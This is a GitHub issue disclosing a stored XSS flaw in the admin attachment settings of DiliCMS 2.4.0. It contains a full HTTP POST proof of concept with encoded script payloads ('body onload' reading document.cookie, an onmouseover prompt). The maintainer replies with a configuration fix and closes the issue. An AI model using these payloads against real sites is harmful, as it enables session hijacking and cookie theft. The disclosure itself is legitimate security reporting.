Skip to content
This repository has been archived by the owner on Jan 10, 2019. It is now read-only.

XSS Vulnerability Found in DiliCMS 2.4.0 in tab=site_attachment #59

Closed
PrincyEdward opened this issue Oct 10, 2018 · 1 comment
Closed

Comments

@PrincyEdward
Copy link

XSS Vulnerability Found in DiliCMS 2.4.0 in tab=site_attachment
Software Link : https://github.com/chekun/DiliCMS/tree/v2.4.0
POC :
POST /DiliCMS-2.4.0/admin/index.php/setting/site?tab=site_attachment HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/DiliCMS-2.4.0/admin/index.php/setting/site?tab=site_attachment
Content-Type: application/x-www-form-urlencoded
Content-Length: 273
Cookie: dili_session=xxxxx
Connection: close
Upgrade-Insecure-Requests: 1

dilicms_csrf_token=6f4a225b12c2c472984c72af51fdf31b&attachment_url=aaa%22%3E%3Cbody+onload%3Dalert%28document.cookie%29%3E&attachment_dir=attachments&attachment_type=.jpg%3B.gif%3B*.png%3B*.doc%20%22+onmouseover%3Dprompt%28907460%29+bad%3D%22&attachment_maxupload=2097152

Screenshots :
payload
popup2
popup1

@chekun
Copy link
Owner

chekun commented Oct 11, 2018

Yes, Thank you. But DiliCMS is not a software for production literally.
this vulnerability can be easily fixed by setting global_xss_filtering to true in config file https://github.com/chekun/DiliCMS/blob/v2.4.0/application/config/config.php#L282

@chekun chekun closed this as completed Oct 14, 2018
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants